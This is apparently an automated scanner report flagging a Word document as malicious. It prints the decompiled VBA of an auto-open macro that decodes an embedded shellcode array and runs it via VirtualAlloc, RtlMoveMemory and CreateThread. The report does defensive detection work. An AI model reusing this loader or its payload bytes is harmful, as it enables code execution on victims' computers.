Verdict: MALICIOUS
Risk Score: 242
Heuristics: 7
- CVE-2007-3899 — Microsoft Word malformed string memory corruption (critical, CVE likely) [CVE_2007_3899]: Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
- Raw OLE macro native-memory callback shellcode loader (critical) [OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER]: Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
- VBA macros detected (medium, 1 related finding) [OLE_VBA_MACROS]: Document contains VBA macro code.
- VBA native-memory callback shellcode loader (critical) [OLE_VBA_NATIVE_MEMORY_CALLBACK_LOADER]: VBA auto-exec macro declares or calls native memory allocation, process-memory write/copy, and callback/timer execution APIs. This is the in-memory shellcode loader pattern: allocate writable memory, copy decoded payload bytes into it, then transfer control through a callback such as CreateTimerQueueTimer. Benign document automation does not combine these primitives.
  Matched line in script: ' Line #1: ' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr) ' Line #2:
- Reference to VirtualAlloc API (medium) [SC_STR_VIRTUALALLOC]: Reference to VirtualAlloc API.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13271 bytes |
SHA-256 (macros.bas): f911190bd2ceb9cf10fef23a8166511dc529842886815c5ce9191af67c4d9e58

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/de677edc628b4e2b896aa1101ab8d833.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 954 bytes
' Macros/VBA/NewMacros - 6601 bytes
' Line #0:
' FuncDefn (Function CreateThread(ByVal SecurityAttributes As Long) As Ptr)
' Line #1:
' FuncDefn (Function VirtualAlloc(ByVal lpAddress As Ptr) As Ptr)
' Line #2:
' FuncDefn (Function RtlMoveMemory(ByVal lDestination As Ptr) As Ptr)
' Line #3:
' FuncDefn (Function vinayagar())
' Line #4:
' Dim
' VarDefn buf (As Variant)
' Line #5:
' Dim
' VarDefn addr (As Ptr)
' Line #6:
' Dim
' VarDefn counter (As Long)
' Line #7:
' Dim
' VarDefn data (As Long)
' Line #8:
' Line #9:
' Line #10:
' LineCont 0x0044 40 00 00 00 7C 00 00 00 B8 00 00 00 F4 00 00 00 30 01 00 00 6C 01 00 00 A8 01 00 00 E4 01 00 00 20 02 00 00 5C 02 00 00 98 02 00 00 D4 02 00 00 10 03 00 00 4C 03 00 00 88 03 00 00 C4 03 00 00 00 04 00 00
' LitDI2 0x00FE
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00E6
' LitDI2 0x00F2
' LitDI2 0x00EA
' LitDI2 0x00CE
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x0053
' LitDI2 0x0043
' LitDI2 0x0052
' LitDI2 0x0054
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00D4
' LitDI2 0x0067
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0062
' LitDI2 0x0053
' LitDI2 0x0058
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x001A
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0022
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0074
' LitDI2 0x0052
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004A
' LitDI2 0x0011
' LitDI2 0x00B9
' LitDI2 0x004C
' LitDI2 0x004C
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x00AE
' LitDI2 0x003E
' LitDI2 0x0063
' LitDI2 0x007E
' LitDI2 0x0004
' LitDI2 0x002E
' LitDI2 0x0022
' LitDI2 0x0043
' LitDI2 0x00C3
' LitDI2 0x00CB
' LitDI2 0x000F
' LitDI2 0x0043
' LitDI2 0x0003
' LitDI2 0x00C3
' LitDI2 0x00E4
' LitDI2 0x00EF
' LitDI2 0x0054
' LitDI2 0x0043
' LitDI2 0x0053
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0054
' LitDI2 0x0022
' LitDI2 0x008D
' LitDI2 0x0044
' LitDI2 0x003E
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0068
' LitDI2 0x0083
' LitDI2 0x007A
' LitDI2 0x001A
' LitDI2 0x000D
' LitDI2 0x0004
' LitDI2 0x0011
' LitDI2 0x0087
' LitDI2 0x0074
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x008D
' LitDI2 0x0082
' LitDI2 0x008A
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004A
' LitDI2 0x0087
' LitDI2 0x00C2
' LitDI2 0x0076
' LitDI2 0x0069
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x008D
' LitDI2 0x004A
' LitDI2 0x001A
' LitDI2 0x0052
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x0022
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x00E5
' LitDI2 0x0058
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00CB
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x0036
' LitDI2 0x008A
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D8
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x00AE
' LitDI2 0x0043
' LitDI2 0x00C3
' LitDI2 0x00CB
' LitDI2 0x000F
' LitDI2 0x0043
' LitDI2 0x0003
' LitDI2 0x00C3
' LitDI2 0x003A
' LitDI2 0x00E2
' LitDI2 0x0077
' LitDI2 0x00F3
' LitDI2 0x004E
' LitDI2 0x0005
' LitDI2 0x004E
' LitDI2 0x0026
' LitDI2 0x000A
' LitDI2 0x0047
' LitDI2 0x003B
' LitDI2 0x00D3
' LitDI2 0x0077
' LitDI2 0x00DA
' LitDI2 0x005A
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x0026
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0068
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x000E
' LitDI2 0x004A
' LitDI2 0x0046
' LitDI2 0x008D
' LitDI2 0x0042
' LitDI2 0x001E
' LitDI2 0x004B
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0043
' LitDI2 0x008D
' LitDI2 0x0006
' LitDI2 0x008A
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00D2
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x0060
' LitDI2 0x005B
' LitDI2 0x005C
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x005C
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00EE
' LitDI2 0x0022
' LitDI2 0x0043
' LitDI2 0x0054
' LitDI2 0x0001
' LitDI2 0x00E2
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x005C
' LitDI2 0x004A
' LitDI2 0x008D
' LitDI2 0x0014
' LitDI2 0x00EB
' LitDI2 0x004D
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x005F
' LitDI2 0x004B
' LitDI2 0x00C0
' LitDI2 0x0079
' LitDI2 0x0075
' LitDI2 0x0034
' LitDI2 0x0061
' LitDI2 0x0035
' LitDI2 0x0034
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x0058
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E8
' LitDI2 0x004A
' LitDI2 0x0083
' LitDI2 0x00EE
' LitDI2 0x00A2
' LitDI2 0x0003
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E7
' LitDI2 0x004B
' LitDI2 0x00BE
' LitDI2 0x0004
' LitDI2 0x0002
' LitDI2 0x0003
' LitDI2 0x00BD
' LitDI2 0x00C2
' LitDI2 0x00AA
' LitDI2 0x0002
' LitDI2 0x0006
' LitDI2 0x0043
' LitDI2 0x0056
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00E6
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00F3
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x004E
' LitDI2 0x0079
' LitDI2 0x0028
' LitDI2 0x0009
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00EC
' LitDI2 0x006A
' LitDI2 0x0003
' LitDI2 0x0003
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x002B
' LitDI2 0x0082
' LitDI2 0x006D
' LitDI2 0x0002
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x006C
' LitDI2 0x000C
' LitDI2 0x0043
' LitDI2 0x0060
' LitDI2 0x0052
' LitDI2 0x0052
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C4
' LitDI2 0x004A
' LitDI2 0x0001
' LitDI2 0x00C2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C3
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x00EC
' LitDI2 0x0011
' LitDI2 0x00E1
' LitDI2 0x00E2
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C9
' LitDI2 0x006C
' LitDI2 0x0012
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004E
' LitDI2 0x008B
' LitDI2 0x00E4
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x009B
' LitDI2 0x00A7
' LitDI2 0x0076
' LitDI2 0x0063
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0087
' LitDI2 0x00C2
' LitDI2 0x0076
' LitDI2 0x000C
' LitDI2 0x004B
' LitDI2 0x0001
' LitDI2 0x00D0
' LitDI2 0x0077
' LitDI2 0x00E7
' LitDI2 0x00EA
' LitDI2 0x0095
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00EE
' LitDI2 0x0012
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00E4
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x006C
' LitDI2 0x0006
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0004
' LitDI2 0x00DB
' LitDI2 0x00CA
' LitDI2 0x0061
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0085
' LitDI2 0x00FA
' LitDI2 0x0002
' LitDI2 0x0080
' LitDI2 0x0057
' LitDI2 0x004A
' LitDI2 0x0085
' LitDI2 0x00C6
' LitDI2 0x0022
' LitDI2 0x0060
' LitDI2 0x008B
' LitDI2 0x00F8
' LitDI2 0x006C
' LitDI2 0x0042
' LitDI2 0x0043
' LitDI2 0x005B
' LitDI2 0x006A
' LitDI2 0x0002
' LitDI2 0x0012
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00F4
' LitDI2 0x004A
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x005A
' LitDI2 0x00A6
' LitDI2 0x0055
' LitDI2 0x00E7
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00C5
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00C9
' LitDI2 0x004F
' LitDI2 0x0033
' LitDI2 0x00CB
' LitDI2 0x004B
' LitDI2 0x008B
' LitDI2 0x00F2
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00DC
' LitDI2 0x004A
' LitDI2 0x008B
' LitDI2 0x00FB
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0004
' LitDI2 0x00DB
' LitDI2 0x00CA
' LitDI2 0x0061
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0085
' LitDI2 0x00FA
' LitDI2 0x0002
' LitDI2 0x007F
' LitDI2 0x002A
' LitDI2 0x005A
' LitDI2 0x0043
' LitDI2 0x0059
' LitDI2 0x005B
' LitDI2 0x006A
' LitDI2 0x0002
' LitDI2 0x0042
' LitDI2 0x0002
' LitDI2 0x0002
' LitDI2 0x0043
' LitDI2 0x005A
' LitDI2 0x006C
' LitDI2 0x0002
' LitDI2 0x005C
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x000D
' LitDI2 0x0031
' LitDI2 0x0011
' LitDI2 0x0032
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x0059
' LitDI2 0x005B
' LitDI2 0x0043
' LitDI2 0x00BC
' LitDI2 0x0077
' LitDI2 0x0070
' LitDI2 0x004F
' LitDI2 0x0063
' LitDI2 0x0001
' LitDI2 0x00D7
' LitDI2 0x004B
' LitDI2 0x0001
' LitDI2 0x00D0
' LitDI2 0x00EB
' LitDI2 0x003E
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI2 0x004A
' LitDI2 0x0003
' LitDI2 0x00C5
' LitDI2 0x004A
' LitDI2 0x002B
' LitDI2 0x00C8
' LitDI2 0x004A
' LitDI2 0x0087
' LitDI2 0x00F8
' LitDI2 0x0077
' LitDI2 0x00B6
' LitDI2 0x0043
' LitDI2 0x0001
' LitDI2 0x00E9
' LitDI2 0x005A
' LitDI2 0x006C
' LitDI2 0x0002
' LitDI2 0x005B
' LitDI2 0x00BD
' LitDI2 0x00E2
' LitDI2 0x001F
' LitDI2 0x002C
' LitDI2 0x000C
' LitDI2 0x0043
' LitDI2 0x008B
' LitDI2 0x00DC
' LitDI2 0x0001
' LitDI2 0x00D7
' ArgsArray Array 0x01FF
' St buf
' Line #11:
' Line #12:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #13:
' Ld i
' ArgsLd buf 0x0001
' LitDI2 0x0002
' Sub
' Ld i
' ArgsSt buf 0x0001
' Line #14:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #15:
' Line #16:
' LitDI2 0x0000
' Ld buf
' FnUBound 0x0000
' LitHI2 0x3000
' LitHI2 0x0040
' ArgsLd VirtualAlloc 0x0004
' St addr
' Line #17:
' StartForVariable
' Ld counter
' EndForVariable
' Ld buf
' FnLBound 0x0000
' Ld buf
' FnUBound 0x0000
' For
' Line #18:
' Ld counter
' ArgsLd buf 0x0001
' St data
' Line #19:
' Ld addr
' Ld counter
' Add
' Ld data
' LitDI2 0x0001
' ArgsLd RtlMoveMemory 0x0003
' St res
' Line #20:
' StartForVariable
' Ld counter
' EndForVariable
' NextVar
' Line #21:
' LitDI2 0x0000
' LitDI2 0x0000
' Ld addr
' LitDI2 0x0000
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsLd CreateThread 0x0006
' St res
' Line #22:
' EndFunc
' Line #23:
' FuncDefn (Sub Document_Open())
' Line #24:
' ArgsCall vinayagar 0x0000
' Line #25:
' EndSub
' Line #26:
' FuncDefn (Sub AutoOpen())
' Line #27:
' ArgsCall vinayagar 0x0000
' Line #28:
' EndSub
' Line #29: